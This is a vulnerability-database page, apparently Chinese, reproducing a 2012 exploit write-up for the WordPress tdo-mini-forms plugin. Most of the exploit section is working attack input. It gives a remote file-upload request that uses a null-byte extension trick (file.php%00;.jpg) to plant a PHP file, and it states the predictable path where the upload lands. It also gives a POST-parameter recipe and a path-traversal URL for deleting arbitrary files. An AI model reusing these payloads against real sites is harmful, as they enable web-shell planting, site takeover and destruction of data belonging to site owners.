wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046081 漏洞类型
发布时间 2012-11-21 更新时间 2012-11-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110149
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
 
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities
Auther : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man 
 
 
# Remote file upload :
 
wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
 
file extension : file.php%00;.jpg
uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
 
Example to uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
 
 
 
# Remote file Deletion
 
=> Note : useing Any http POST header modifier .
 
tdomf_form_id = 1;
deletefile[]  = 1;
filepath      = $varibale ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index         = NULL
 
Example to result : 
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
 
Eof;